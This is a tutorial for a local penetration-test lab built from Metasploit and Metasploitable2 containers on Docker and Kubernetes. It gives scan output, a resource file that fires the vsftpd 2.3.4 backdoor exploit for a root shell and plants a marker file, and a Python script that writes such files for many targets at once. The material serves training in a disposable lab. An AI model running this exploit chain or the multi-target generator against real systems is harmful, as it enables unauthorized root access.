The purpose of this article is to make it easy to build a penetration test environment, with no other complicated setup, as long as Docker and Kubernetes are installed.
[Please note that applying the content of this article to a server or network you do not manage may violate the Unauthorized Access Prohibition Law.]
Environment used in this article
$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.5 LTS"
$ docker --version
Docker version 18.09.0, build 4d60db4
$ minikube version
minikube version: v0.29.0
Things necessary
Everything I plan to use this time is on GitHub and Docker Hub. The Dockerfile for the Metasploit image is also on GitHub, so feel free to modify it to suit your needs.
Now, run the commands below in order to get what you need.
$ git clone https://github.com/SauravBrahma/MetasploitImage.git
$ docker pull sauravbrahma/metasploit_image
$ docker pull tleemcjr/metasploitable2
Up to this point we have obtained what we need, so let's actually run it.
Environment construction with Docker
$ docker run --rm -it tleemcjr/metasploitable2:latest sh -c "/bin/services.sh && bash"
 * Starting web server apache2                                   [ OK ]
 * Starting deferred execution scheduler atd                     [ OK ]
 * Starting periodic command scheduler crond                     [ OK ]
...
 * Starting internet superserver xinetd                          [ OK ]
 * Doing Wacom setup...                                          [ OK ]
 * Running local boot scripts (/etc/rc.local)                    [ OK ]
root@c3803e096580:/#
# Record the IP address, as you will need it later when specifying the attack target.
root@c3803e096580:/# ifconfig | grep 172
          inet addr:172.17.0.5  Bcast:172.17.255.255  Mask:255.255.0.0
# Press Ctrl-p then Ctrl-q to detach from the container while leaving it running, then check that it is still up.
$ docker ps | grep tleemcjr/metasploitable2
c3803e096580   tleemcjr/metasploitable2:latest   "sh -c '/bin/service…"   8 minutes ago   Up 8 minutes   vigorous_kalam
$ docker run --rm -it sauravbrahma/metasploit_image:latest bash
 * Starting PostgreSQL 9.3 database server                       [ OK ]
msf_user@ef8a1f8f6923:/opt/metasploit-framework$
With the above, environment construction with Docker is complete. The --rm option is added at run time so that no leftover container remains after you exit; note that this also means the Metasploit database and any files written to the target disappear when the respective container stops. You can also read the target's address from the host, without entering the container, with docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' c3803e096580.
Do a penetration test with Docker
Here, let's actually perform a penetration test using Docker. Since you are currently logged in to the attack container, run msfconsole to launch the Metasploit console. (The container IDs and the target address in the outputs below differ from the previous step because they were captured in a separate run; use the values from your own session.)
msf_user@c9521edd20f4:/opt/metasploit-framework$ msfconsole
** Welcome to Metasploit Framework Initial Setup **
Please answer a few questions to get started.
** Metasploit Framework Initial Setup Complete **
(Metasploit ASCII art banner omitted)
       =[ metasploit v4.17.35-dev-                        ]
+ -- --=[ 1845 exploits - 1044 auxiliary - 320 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >
This time, I would like to proceed in the following order.
- Store the result of running Nmap against Metasploitable in the database
- Decide which module to use and attack
- Leave a text file reading "You've been hacked" on Metasploitable as evidence of a successful attack
- Check that the text file exists on the Metasploitable side
Let's attack!
Store the result of running Nmap against Metasploitable in the database
First, let's check that Metasploit is connected to the database.
msf > db_status
[*] postgresql connected to msf_database
msf >
Since the Docker image used this time is connected to the database from the start, it should print the above.
Now let's run Nmap against Metasploitable and store the result in the database. Replace 172.17.0.2 with the address you recorded earlier.
msf > db_nmap -A 172.17.0.2
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2019-01-25 08:56 UTC
[*] Nmap: Nmap scan report for 172.17.0.2
[*] Nmap: Host is up (0.00054s latency).
[*] Nmap: Not shown: 980 closed ports
[*] Nmap: PORT     STATE SERVICE     VERSION
[*] Nmap: 21/tcp   open  ftp         vsftpd 2.3.4
[*] Nmap: |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
[*] Nmap: 22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: | ssh-hostkey:
[*] Nmap: |   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
[*] Nmap: |_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
[*] Nmap: 23/tcp   open  telnet      Linux telnetd
[*] Nmap: 25/tcp   open  smtp        Postfix smtpd
[*] Nmap: |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
[*] Nmap: | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
[*] Nmap: | Not valid before: 2010-03-17T14:07:45
[*] Nmap: |_Not valid after:  2010-04-16T14:07:45
[*] Nmap: |_ssl-date: 2019-01-25T08:58:24+00:00; 0s from scanner time.
[*] Nmap: 111/tcp  open  rpcbind     2 (RPC #100000)
[*] Nmap: | rpcinfo:
[*] Nmap: |   program version   port/proto  service
[*] Nmap: |   100000  2           111/tcp  rpcbind
[*] Nmap: |   100003  2,3,4      2049/tcp  nfs
[*] Nmap: |   100003  2,3,4      2049/udp  nfs
[*] Nmap: |   100005  1,2,3     50419/tcp  mountd
[*] Nmap: |   100005  1,2,3     58275/udp  mountd
[*] Nmap: |   100021  1,3,4     33414/tcp  nlockmgr
[*] Nmap: |   100021  1,3,4     58022/udp  nlockmgr
[*] Nmap: |   100024  1         42939/tcp  status
[*] Nmap: |_  100024  1         49024/udp  status
[*] Nmap: 139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 512/tcp  open  exec        netkit-rsh rexecd
[*] Nmap: 513/tcp  open  login
[*] Nmap: 514/tcp  open  tcpwrapped
[*] Nmap: 1099/tcp open  java-rmi    Java RMI Registry
[*] Nmap: 1524/tcp open  ingreslock?
[*] Nmap: 2121/tcp open  ftp         ProFTPD 1.3.1
[*] Nmap: 3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
[*] Nmap: | mysql-info:
[*] Nmap: |   Protocol: 53
[*] Nmap: |   Version: .0.51a-3ubuntu5
[*] Nmap: |   Thread ID: 9
[*] Nmap: |   Capabilities flags: 43564
[*] Nmap: |   Some Capabilities: Support41Auth, Speaks41ProtocolNew, ConnectWithDatabase, SwitchToSSLAfterHandshake, SupportsCompression, SupportsTransactions, LongColumnFlag
[*] Nmap: |   Status: Autocommit
[*] Nmap: |_  Salt: g>=Vy7.~VoOz<W#H!Ju
[*] Nmap: 5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
[*] Nmap: 5900/tcp open  vnc         VNC (protocol 3.3)
[*] Nmap: | vnc-info:
[*] Nmap: |   Protocol version: 3.3
[*] Nmap: |   Security types:
[*] Nmap: |_    Unknown security type (33554432)
[*] Nmap: 6000/tcp open  X11         (access denied)
[*] Nmap: 6667/tcp open  irc         Unreal ircd
[*] Nmap: | irc-info:
[*] Nmap: |   users: 1
[*] Nmap: |   servers: 1
[*] Nmap: |   lusers: 1
[*] Nmap: |   lservers: 0
[*] Nmap: |   server: irc.Metasploitable.LAN
[*] Nmap: |   version: Unreal3.2.8.1. irc.Metasploitable.LAN
[*] Nmap: |   uptime: 0 days, 0:32:56
[*] Nmap: |   source ident: nmap
[*] Nmap: |   source host: 36620686.BF756E4.69365C88.IP
[*] Nmap: |_  error: Closing Link: pepuwvzow[172.17.0.3] (Quit: pepuwvzow)
[*] Nmap: 8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
[*] Nmap: |_ajp-methods: Failed to get a valid response for the OPTION request
[*] Nmap: 8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
[*] Nmap: |_http-favicon: Apache Tomcat
[*] Nmap: |_http-server-header: Apache-Coyote/1.1
[*] Nmap: |_http-title: Apache Tomcat/5.5
[*] Nmap: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
[*] Nmap: SF-Port1524-TCP:V=7.01%I=7%D=1/25%Time=5C4ACF30%P=x86_64-pc-linux-gnu%r(NU
...
[*] Nmap: Host script results:
[*] Nmap: |_nbstat: NetBIOS name: 14586EEA2FB4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
[*] Nmap: | smb-os-discovery:
[*] Nmap: |   OS: Unix (Samba 3.0.20-Debian)
[*] Nmap: |   NetBIOS computer name:
[*] Nmap: |   Workgroup: WORKGROUP
[*] Nmap: |_  System time: 2019-01-25T03:58:24-05:00
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 137.18 seconds
msf >
Since the -A option (OS and version detection, script scanning and traceroute) is used, the scan takes a while, so be patient.
With this, I learned the target's open ports, the services listening on them and the OS that is most likely running. These results are stored in the PostgreSQL database of the container you are currently logged in to, so you can also inspect them with an SQL query.
msf > exit
msf_user@c9521edd20f4:/opt/metasploit-framework$ psql -U msf_user msf_database
psql (9.3.17)
Type "help" for help.
msf_database=# SELECT * FROM services;
 id | host_id |         created_at         | port | proto | state |    name     |         updated_at         |                    info
----+---------+----------------------------+------+-------+-------+-------------+----------------------------+--------------------------------------------
  1 |       1 | 2019-01-25 08:58:27.315887 |   21 | tcp   | open  | ftp         | 2019-01-25 08:58:27.315887 | vsftpd 2.3.4
  2 |       1 | 2019-01-25 08:58:27.777045 |   22 | tcp   | open  | ssh         | 2019-01-25 08:58:27.777045 | OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
  3 |       1 | 2019-01-25 08:58:27.815226 |   23 | tcp   | open  | telnet      | 2019-01-25 08:58:27.815226 | Linux telnetd
  4 |       1 | 2019-01-25 08:58:27.848245 |   25 | tcp   | open  | smtp        | 2019-01-25 08:58:27.848245 | Postfix smtpd
  5 |       1 | 2019-01-25 08:58:27.913605 |  111 | tcp   | open  | rpcbind     | 2019-01-25 08:58:27.913605 | 2 RPC #100000
  6 |       1 | 2019-01-25 08:58:27.956202 |  139 | tcp   | open  | netbios-ssn | 2019-01-25 08:58:27.956202 | Samba smbd 3.X workgroup: WORKGROUP
  7 |       1 | 2019-01-25 08:58:27.989778 |  445 | tcp   | open  | netbios-ssn | 2019-01-25 08:58:27.989778 | Samba smbd 3.X workgroup: WORKGROUP
  8 |       1 | 2019-01-25 08:58:28.026979 |  512 | tcp   | open  | exec        | 2019-01-25 08:58:28.026979 | netkit-rsh rexecd
  9 |       1 | 2019-01-25 08:58:28.059262 |  513 | tcp   | open  | login       | 2019-01-25 08:58:28.059262 |
 10 |       1 | 2019-01-25 08:58:28.096009 |  514 | tcp   | open  | tcpwrapped  | 2019-01-25 08:58:28.096009 |
 11 |       1 | 2019-01-25 08:58:28.135852 | 1099 | tcp   | open  | java-rmi    | 2019-01-25 08:58:28.135852 | Java RMI Registry
 12 |       1 | 2019-01-25 08:58:28.182279 | 1524 | tcp   | open  | ingreslock  | 2019-01-25 08:58:28.182279 |
 13 |       1 | 2019-01-25 08:58:28.239117 | 2121 | tcp   | open  | ftp         | 2019-01-25 08:58:28.239117 | ProFTPD 1.3.1
 14 |       1 | 2019-01-25 08:58:28.270095 | 3306 | tcp   | open  | mysql       | 2019-01-25 08:58:28.270095 | MySQL 5.0.51a-3ubuntu5
 15 |       1 | 2019-01-25 08:58:28.302865 | 5432 | tcp   | open  | postgresql  | 2019-01-25 08:58:28.302865 | PostgreSQL DB 8.3.0 - 8.3.7
 16 |       1 | 2019-01-25 08:58:28.328482 | 5900 | tcp   | open  | vnc         | 2019-01-25 08:58:28.328482 | VNC protocol 3.3
 17 |       1 | 2019-01-25 08:58:28.372125 | 6000 | tcp   | open  | x11         | 2019-01-25 08:58:28.372125 | access denied
 18 |       1 | 2019-01-25 08:58:28.399048 | 6667 | tcp   | open  | irc         | 2019-01-25 08:58:28.399048 | Unreal ircd
 19 |       1 | 2019-01-25 08:58:28.435059 | 8009 | tcp   | open  | ajp13       | 2019-01-25 08:58:28.435059 | Apache Jserv Protocol v1.3
 20 |       1 | 2019-01-25 08:58:28.479801 | 8180 | tcp   | open  | http        | 2019-01-25 08:58:28.479801 | Apache Tomcat/Coyote JSP engine 1.1
(20 rows)
msf_database=# \q
msf_user@c9521edd20f4:/opt/metasploit-framework$
By storing the Nmap results in the database this way, you can export them, or import them into other tooling when automating. Also, when there are many entries in the database, you can select attack targets that meet certain conditions with the hosts and services commands (for example, services -p 21 lists every recorded host with port 21 open).
Decide which module to use and attack
Metasploit used to ship db_autopwn, a plugin for automated attacks; it is deprecated and no longer part of the framework. db_autopwn attacked targets automatically using the information about them stored in the database. The Docker image used this time is set up so that db_autopwn can still be used (run load db_autopwn and then db_autopwn <option>), but it fires far too many exploits to be useful against one genuine vulnerability, so this time I chose a different method from the article "Six techniques for automating attacks" instead. That article describes resource files, which automate the console: tasks you would otherwise type repeatedly are written into a resource file and replayed. Furthermore, a resource file saved as ~/.msf4/msfconsole.rc is executed every time the console starts.
This time I will not attack repeatedly, but resource files look usable with Kubernetes, which is described later, so I will attack using one. Also, the Nmap results showed an ftp service on port 21 (vsftpd 2.3.4), so I will use the well-known module for it. The resource file, easy_pentes.rc:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 172.17.0.2
exploit -z
sessions -i 1 -c "id"
sessions -i 1 -c "pwd"
sessions -i 1 -c "echo \"You've been hacked\" > /hacked.txt"
exit -y
That's all you have to write in the resource file: only the module to use, the IP of the attack target, and the commands to execute. In the sessions command, -i selects which session to use and -c specifies the command to run in it.
Let’s execute this resource file from Metasploit immediately.
msf_user@c9521edd20f4:/opt/metasploit-framework$ msfconsole -q -r easy_pentes.rc
[*] Processing easy_pentes.rc for ERB directives.
resource (easy_pentes.rc)> use exploit/unix/ftp/vsftpd_234_backdoor
resource (easy_pentes.rc)> set RHOST 172.17.0.2
RHOST => 172.17.0.2
resource (easy_pentes.rc)> exploit -z
[*] 172.17.0.2:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 172.17.0.2:21 - USER: 331 Please specify the password.
[+] 172.17.0.2:21 - Backdoor service has been spawned, handling...
[+] 172.17.0.2:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Session 1 created in the background.
resource (easy_pentes.rc)> sessions -i 1 -c "id"
[*] Running 'id' on shell session 1 (172.17.0.2)
uid=0(root) gid=0(root)
resource (easy_pentes.rc)> sessions -i 1 -c "pwd"
[*] Running 'pwd' on shell session 1 (172.17.0.2)
/
resource (easy_pentes.rc)> sessions -i 1 -c "echo \"You've been hacked\" > /hacked.txt"
[*] Running 'echo "You've been hacked" > /hacked.txt' on shell session 1 (172.17.0.2)
resource (easy_pentes.rc)> exit -y
msf_user@c9521edd20f4:/opt/metasploit-framework$
The attack went through. The output shows that root privileges were obtained on the target, and that the working directory at the time of the successful attack is /, the top of the filesystem. As for the msfconsole options, -r reads the resource file and -q suppresses the banner.
Check that the text file exists on the Metasploitable side
Let's confirm from the Metasploitable side that the attack succeeded. Log in to the Metasploitable container (for example with docker attach, or docker exec -it <container> bash). As confirmed earlier, hacked.txt was written to /, so there is no need to change directory.
root@ee769a0fc9f6:/# ls
bin  boot  cdrom  core  dev  etc  hacked.txt  home  initrd  initrd.img  lib  lost+found  media  mnt  nohup.out  opt  proc  root  sbin  srv  sys  tmp  usr  var  vmlinuz
root@ee769a0fc9f6:/# cat hacked.txt
You've been hacked
root@ee769a0fc9f6:/#
It is confirmed from the Metasploitable side as well that the host was compromised.
That's all for the penetration test using Docker.
Try making many of them with Kubernetes
The two manifests are in the yaml directory of the repository cloned earlier, so run the following from that directory.
$ kubectl apply -f yaml/metasploit.yaml
replicaset.apps/metasploit-rc created
$ kubectl apply -f yaml/metasploitable.yaml
replicaset.apps/metasploitable2-rc created
$ kubectl get pods -o wide
NAME                       READY   STATUS              RESTARTS   AGE   IP           NODE
metasploit-rc-nxwd2        1/1     Running             0          17s   172.17.0.5   minikube
metasploitable2-rc-f9dzd   1/1     Running             0          11s   172.17.0.6   minikube
metasploitable2-rc-mbz95   0/1     ContainerCreating   0          11s   <none>       minikube
metasploitable2-rc-s2lwh   0/1     ContainerCreating   0          11s   <none>       minikube
$ kubectl get pods -o wide
NAME                       READY   STATUS    RESTARTS   AGE   IP           NODE
metasploit-rc-nxwd2        1/1     Running   0          23s   172.17.0.5   minikube
metasploitable2-rc-f9dzd   1/1     Running   0          17s   172.17.0.6   minikube
metasploitable2-rc-mbz95   1/1     Running   0          17s   172.17.0.8   minikube
metasploitable2-rc-s2lwh   1/1     Running   0          17s   172.17.0.7   minikube
This time I used the ReplicaSet resource because I wanted an easy way to create many Metasploit pods and Metasploitable pods. By default one Metasploit pod and three Metasploitable pods are created, but you can create as many verification environments as you like by changing the spec.replicas field of each YAML file. Note that pod IPs are assigned when a pod starts and change whenever the ReplicaSet replaces a pod, so read them from kubectl get pods -o wide each time rather than hard-coding them.
Now let's go into one of the pods above and check that it can reach the other pods. (With newer versions of kubectl, separate the command with --: kubectl exec -it metasploit-rc-nxwd2 -- bash.)
$ kubectl exec -it metasploit-rc-nxwd2 bash
msf_user@metasploit-rc-nxwd2:/opt/metasploit-framework$ ping 172.17.0.6
PING 172.17.0.6 (172.17.0.6) 56(84) bytes of data.
64 bytes from 172.17.0.6: icmp_seq=1 ttl=64 time=0.088 ms
64 bytes from 172.17.0.6: icmp_seq=2 ttl=64 time=0.049 ms
64 bytes from 172.17.0.6: icmp_seq=3 ttl=64 time=0.039 ms
64 bytes from 172.17.0.6: icmp_seq=4 ttl=64 time=0.040 ms
^C
--- 172.17.0.6 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.039/0.054/0.088/0.020 ms
The pods can reach each other, so environment construction with Kubernetes is complete.
You can perform the penetration test on Kubernetes in the same way as shown with Docker: run db_nmap against a pod IP, then run the resource file with RHOST set to that IP. Since Metasploitable2 is deliberately vulnerable and, by default, reachable from every other pod on the cluster network, keep this environment on a disposable local cluster such as the minikube VM used here rather than on a shared cluster.
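Both the earlier remark that the database lets you select targets that meet certain conditions, and this section's goal of attacking many Metasploitable pods at once, come down to the same task: turn a list of hosts into a resource file like easy_pentes.rc with one exploit run per host. The Python script below is an added example; it is not from the article or the MetasploitImage repository. It assumes the services table is exported from the attacker container with psql -At -F '|' using the query in EXPORT_QUERY, and that the pod list comes from kubectl get pods -o json. The sample rows and pod JSON embedded in it are constructed for the demonstration, and the output filename easy_pentes_all.rc is my own choice.

```python
"""Build a resource file like easy_pentes.rc for many targets.

Added example, not part of the article or the MetasploitImage repository.
Two target sources are supported:
  * the Metasploit database, exported from the attacker container with
      psql -U msf_user -At -F '|' msf_database -c "<EXPORT_QUERY>"
  * the pod list from `kubectl get pods -o json`
"""
import json
from dataclasses import dataclass

# Assumed export query; its column order is what parse_psql_rows() expects.
EXPORT_QUERY = (
    "SELECT h.address, s.port, s.proto, s.name, s.info "
    "FROM services s JOIN hosts h ON h.id = s.host_id "
    "WHERE s.state = 'open'"
)


@dataclass(frozen=True)
class Service:
    address: str
    port: int
    proto: str
    name: str
    info: str


def parse_psql_rows(text):
    """Parse `psql -At -F '|'` output: one row per line, no header, no footer."""
    services = []
    for line in text.splitlines():
        if not line.strip():
            continue
        address, port, proto, name, info = line.split("|", 4)
        services.append(Service(address, int(port), proto, name, info))
    return services


def select_targets(services, port=21, banner="vsftpd 2.3.4"):
    """Addresses with the given TCP port open and the banner in the version info."""
    return sorted({s.address for s in services
                   if s.proto == "tcp" and s.port == port and banner in s.info})


def pod_ips(kubectl_json, name_prefix="metasploitable2-rc"):
    """IPs of Running pods whose name starts with name_prefix (pods still
    being created have no podIP yet and are skipped)."""
    items = json.loads(kubectl_json)["items"]
    return sorted(p["status"]["podIP"] for p in items
                  if p["metadata"]["name"].startswith(name_prefix)
                  and p["status"].get("phase") == "Running"
                  and p["status"].get("podIP"))


def render_rc(hosts, marker="You've been hacked"):
    """One exploit run per host. `sessions -c` without -i runs the command on
    every open session, so the file does not depend on session numbers and a
    host that fails to exploit does not shift the numbering of the others."""
    lines = []
    for host in hosts:
        lines += ["use exploit/unix/ftp/vsftpd_234_backdoor",
                  f"set RHOST {host}",
                  "exploit -z"]
    lines += ["sessions -l",
              'sessions -c "id"',
              f'sessions -c "echo \\"{marker}\\" > /hacked.txt"',
              "exit -y"]
    return "\n".join(lines) + "\n"


# Constructed sample input: the article's host plus a second host running a
# vsftpd version without the backdoor, which must not be selected.
SAMPLE_ROWS = """\
172.17.0.2|21|tcp|ftp|vsftpd 2.3.4
172.17.0.2|22|tcp|ssh|OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
172.17.0.2|2121|tcp|ftp|ProFTPD 1.3.1
172.17.0.9|21|tcp|ftp|vsftpd 3.0.3
"""

# Constructed sample pod list, modelled on the kubectl output in the article.
SAMPLE_PODS = json.dumps({"items": [
    {"metadata": {"name": "metasploit-rc-nxwd2"},
     "status": {"phase": "Running", "podIP": "172.17.0.5"}},
    {"metadata": {"name": "metasploitable2-rc-f9dzd"},
     "status": {"phase": "Running", "podIP": "172.17.0.6"}},
    {"metadata": {"name": "metasploitable2-rc-mbz95"},
     "status": {"phase": "Running", "podIP": "172.17.0.8"}},
    {"metadata": {"name": "metasploitable2-rc-s2lwh"},
     "status": {"phase": "Pending"}},
]})

if __name__ == "__main__":
    # From the database: only hosts whose banner matches the module's target.
    db_targets = select_targets(parse_psql_rows(SAMPLE_ROWS))
    # From Kubernetes: every running Metasploitable2 pod.
    k8s_targets = pod_ips(SAMPLE_PODS)
    with open("easy_pentes_all.rc", "w") as f:
        f.write(render_rc(sorted(set(db_targets) | set(k8s_targets))))
```

Run it, then msfconsole -q -r easy_pentes_all.rc in the attacker container; on Kubernetes, copy the file into the Metasploit pod with kubectl cp first. Feeding pod IPs straight into the file skips the db_nmap step, which is acceptable here only because every pod runs the same known image. Against anything else, scan first and select from the database, so that the module is only fired at hosts whose banner actually matches.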